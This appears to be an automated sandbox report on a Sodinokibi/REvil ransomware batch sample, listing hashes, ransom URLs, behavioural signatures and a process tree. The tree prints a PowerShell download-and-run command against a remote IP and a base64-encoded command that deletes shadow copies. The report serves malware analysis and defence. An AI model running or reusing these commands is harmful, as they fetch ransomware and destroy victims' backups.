Analysis
-
max time kernel
115s -
max time network
113s -
platform
windows7_x64 -
resource
win7v200430 -
submitted
20-05-2020 14:10
Static task
static1
Behavioral task
behavioral1
Sample
76268c9536af4328d6c0da30152c5045.bat
Resource
win7v200430
Behavioral task
behavioral2
Sample
76268c9536af4328d6c0da30152c5045.bat
Resource
win10v200430
General
-
Target
76268c9536af4328d6c0da30152c5045.bat
-
Size
215B
-
MD5
572a573b2da48bc8e094db663f4d54cd
-
SHA1
3f06e7dc06fac49d4c675ad67cd2ba2113fb6d1e
-
SHA256
8f7ad3b1ae4a99516d4e47fa682097895f767f07cbaf4ac432636610ca16a237
-
SHA512
d90c574c7012e4e58968023d625d18ccf5f713a2a9888e86bb10d692b5db6d9496cc0f3de1778ddfafebf64b5146ca625a58e09e2a939e7140cea9a00521b30d
Malware Config
Extracted
http://185.103.242.78/pastes/76268c9536af4328d6c0da30152c5045
Extracted
C:\4702c1-readme.txt
sodinokibi
http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/5B753BD63BD6B200
http://decryptor.cc/5B753BD63BD6B200
Signatures
-
Suspicious use of WriteProcessMemory 5 IoCs
Processes:
cmd.exepowershell.exedescription pid process target process PID 1008 wrote to memory of 1424 1008 cmd.exe powershell.exe PID 1424 wrote to memory of 1548 1424 powershell.exe powershell.exe PID 1424 wrote to memory of 1548 1424 powershell.exe powershell.exe PID 1424 wrote to memory of 1548 1424 powershell.exe powershell.exe PID 1424 wrote to memory of 1548 1424 powershell.exe powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
Processes:
powershell.exepowershell.exevssvc.exedescription pid process Token: SeDebugPrivilege 1424 powershell.exe Token: SeDebugPrivilege 1424 powershell.exe Token: SeDebugPrivilege 1548 powershell.exe Token: SeBackupPrivilege 528 vssvc.exe Token: SeRestorePrivilege 528 vssvc.exe Token: SeAuditPrivilege 528 vssvc.exe Token: SeTakeOwnershipPrivilege 1424 powershell.exe -
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exepowershell.exepid process 1424 powershell.exe 1424 powershell.exe 1424 powershell.exe 1548 powershell.exe 1548 powershell.exe -
Modifies service 2 TTPs 4 IoCs
Processes:
vssvc.exedescription ioc process Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Shadow Copy Optimization Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\Registry Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\COM+ REGDB Writer vssvc.exe Key created \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\VSS\Diag\ASR Writer vssvc.exe -
Drops file in Program Files directory 32 IoCs
Processes:
powershell.exedescription ioc process File opened for modification \??\c:\program files\InstallFormat.3gp2 powershell.exe File opened for modification \??\c:\program files\SaveConvert.i64 powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\desktop\4702c1-readme.txt powershell.exe File opened for modification \??\c:\program files\DismountExit.jpeg powershell.exe File opened for modification \??\c:\program files\SendTrace.M2V powershell.exe File opened for modification \??\c:\program files\DenyReset.dwg powershell.exe File opened for modification \??\c:\program files\ExpandRemove.mhtml powershell.exe File opened for modification \??\c:\program files\ResetNew.mp4v powershell.exe File opened for modification \??\c:\program files\TestReset.mpe powershell.exe File created \??\c:\program files\microsoft sql server compact edition\v3.5\4702c1-readme.txt powershell.exe File opened for modification \??\c:\program files\GetStep.mhtml powershell.exe File opened for modification \??\c:\program files\OpenEnter.mp4 powershell.exe File opened for modification \??\c:\program files\SwitchDisconnect.scf powershell.exe File opened for modification \??\c:\program files\RedoDisconnect.m4v powershell.exe File opened for modification \??\c:\program files\RemoveDisable.mpeg2 powershell.exe File opened for modification \??\c:\program files\RevokeRead.DVR-MS powershell.exe File opened for modification \??\c:\program files\TestRead.vssx powershell.exe File opened for modification \??\c:\program files\GetRemove.txt powershell.exe File opened for modification \??\c:\program files\LimitOptimize.ogg powershell.exe File opened for modification \??\c:\program files\MergeSelect.ogg powershell.exe File opened for modification \??\c:\program files\NewUse.ttc powershell.exe File opened for modification \??\c:\program files\OpenSave.png powershell.exe File opened for modification \??\c:\program files\ProtectMeasure.ogg powershell.exe File opened for modification \??\c:\program files\TraceMeasure.search-ms powershell.exe File opened for modification \??\c:\program files\UnpublishSuspend.easmx powershell.exe File created \??\c:\program files (x86)\4702c1-readme.txt powershell.exe File opened for modification \??\c:\program files\HideUnblock.pcx powershell.exe File created \??\c:\program files\microsoft sql server compact edition\4702c1-readme.txt powershell.exe File opened for modification \??\c:\program files\SavePing.vstx powershell.exe File created \??\c:\program files\4702c1-readme.txt powershell.exe File opened for modification \??\c:\program files\ConvertFromPublish.dib powershell.exe File opened for modification \??\c:\program files\LimitHide.htm powershell.exe -
Processes:
powershell.exedescription ioc process Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b0601050507030814000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1550b00000001000000120000004400690067006900430065007200740000001d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd9030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee2000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 powershell.exe Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13\Blob = 430000000100000000000000040000000100000010000000410352dc0ff7501b16f0028eba6f45c50f00000001000000140000005bcaa1c2780f0bcb5a90770451d96f38963f012d1900000001000000100000006cf252fec3e8f20996de5d4dd9aef424030000000100000014000000dac9024f54d8f6df94935fb1732638ca6ad77c131d00000001000000100000004558d512eecb27464920897de7b66053140000000100000014000000c4a7b1a47b2c71fadbe14b9075ffc41560858910090000000100000016000000301406082b0601050507030406082b060105050703010b000000010000001e000000440053005400200052006f006f007400200043004100200058003300000020000000010000004e0300003082034a30820232a003020102021044afb080d6a327ba893039862ef8406b300d06092a864886f70d0101050500303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f74204341205833301e170d3030303933303231313231395a170d3231303933303134303131355a303f31243022060355040a131b4469676974616c205369676e617475726520547275737420436f2e311730150603550403130e44535420526f6f7420434120583330820122300d06092a864886f70d01010105000382010f003082010a0282010100dfafe99750088357b4cc6265f69082ecc7d32c6b30ca5becd9c37dc740c118148be0e83376492ae33f214993ac4e0eaf3e48cb65eefcd3210f65d22ad9328f8ce5f777b0127bb595c089a3a9baed732e7a0c063283a27e8a1430cd11a0e12a38b9790a31fd50bd8065dfb7516383c8e28861ea4b6181ec526bb9a2e24b1a289f48a39e0cda098e3e172e1edd20df5bc62a8aab2ebd70adc50b1a25907472c57b6aab34d63089ffe568137b540bc8d6aeec5a9c921e3d64b38cc6dfbfc94170ec1672d526ec38553943d0fcfd185c40f197ebd59a9b8d1dbada25b9c6d8dfc115023aabda6ef13e2ef55c089c3cd68369e4109b192ab62957e3e53d9b9ff0025d0203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e04160414c4a7b1a47b2c71fadbe14b9075ffc41560858910300d06092a864886f70d01010505000382010100a31a2c9b17005ca91eee2866373abf83c73f4bc309a095205de3d95944d23e0d3ebd8a4ba0741fce10829c741a1d7e981addcb134bb32044e491e9ccfc7da5db6ae5fee6fde04eddb7003ab57049aff2e5eb02f1d1028b19cb943a5e48c4181e58195f1e025af00cf1b1ada9dc59868b6ee991f586cafab96633aa595bcee2a7167347cb2bcc99b03748cfe3564bf5cf0f0c723287c6f044bb53726d43f526489a5267b758abfe67767178db0da256141339243185a2a8025a3047e1dd5007bc02099000eb6463609b16bc88c912e6d27d918bf93d328d65b4e97cb15776eac5b62839bf15651cc8f677966a0a8d770bd8910b048e07db29b60aee9d82353510 powershell.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436 powershell.exe -
Suspicious behavior: CmdExeWriteProcessMemorySpam 1 IoCs
Processes:
powershell.exepid process 1424 powershell.exe -
Sets desktop wallpaper using registry 2 TTPs 1 IoCs
Processes:
powershell.exedescription ioc process Set value (str) \REGISTRY\USER\S-1-5-21-910373003-3952921535-3480519689-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\z52r9.bmp" powershell.exe -
Drops file in System32 directory 1 IoCs
Processes:
powershell.exedescription ioc process File opened for modification C:\Windows\System32\CatRoot2\dberr.txt powershell.exe -
Sodin,Sodinokibi,REvil
Ransomware with advanced anti-analysis and privilege escalation functionality.
-
Enumerates connected drives 3 TTPs
-
Blacklisted process makes network request 89 IoCs
Processes:
powershell.exeflow pid process 1 1424 powershell.exe 3 1424 powershell.exe 5 1424 powershell.exe 7 1424 powershell.exe 9 1424 powershell.exe 10 1424 powershell.exe 11 1424 powershell.exe 14 1424 powershell.exe 19 1424 powershell.exe 21 1424 powershell.exe 23 1424 powershell.exe 25 1424 powershell.exe 26 1424 powershell.exe 28 1424 powershell.exe 29 1424 powershell.exe 31 1424 powershell.exe 32 1424 powershell.exe 34 1424 powershell.exe 36 1424 powershell.exe 38 1424 powershell.exe 39 1424 powershell.exe 41 1424 powershell.exe 42 1424 powershell.exe 44 1424 powershell.exe 46 1424 powershell.exe 48 1424 powershell.exe 50 1424 powershell.exe 52 1424 powershell.exe 54 1424 powershell.exe 55 1424 powershell.exe 57 1424 powershell.exe 59 1424 powershell.exe 61 1424 powershell.exe 62 1424 powershell.exe 64 1424 powershell.exe 66 1424 powershell.exe 67 1424 powershell.exe 69 1424 powershell.exe 70 1424 powershell.exe 72 1424 powershell.exe 73 1424 powershell.exe 75 1424 powershell.exe 78 1424 powershell.exe 79 1424 powershell.exe 81 1424 powershell.exe 82 1424 powershell.exe 85 1424 powershell.exe 87 1424 powershell.exe 89 1424 powershell.exe 90 1424 powershell.exe 93 1424 powershell.exe 95 1424 powershell.exe 97 1424 powershell.exe 99 1424 powershell.exe 100 1424 powershell.exe 102 1424 powershell.exe 104 1424 powershell.exe 105 1424 powershell.exe 107 1424 powershell.exe 109 1424 powershell.exe 111 1424 powershell.exe 113 1424 powershell.exe 115 1424 powershell.exe 116 1424 powershell.exe
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\76268c9536af4328d6c0da30152c5045.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:1008 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeC:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/76268c9536af4328d6c0da30152c5045');Invoke-ANLMXOIN;Start-Sleep -s 10000"2⤵
- Suspicious use of WriteProcessMemory
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
- Drops file in Program Files directory
- Modifies system certificate store
- Suspicious behavior: CmdExeWriteProcessMemorySpam
- Sets desktop wallpaper using registry
- Drops file in System32 directory
- Blacklisted process makes network request
PID:1424 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==3⤵
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
PID:1548
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
- Modifies service
PID:528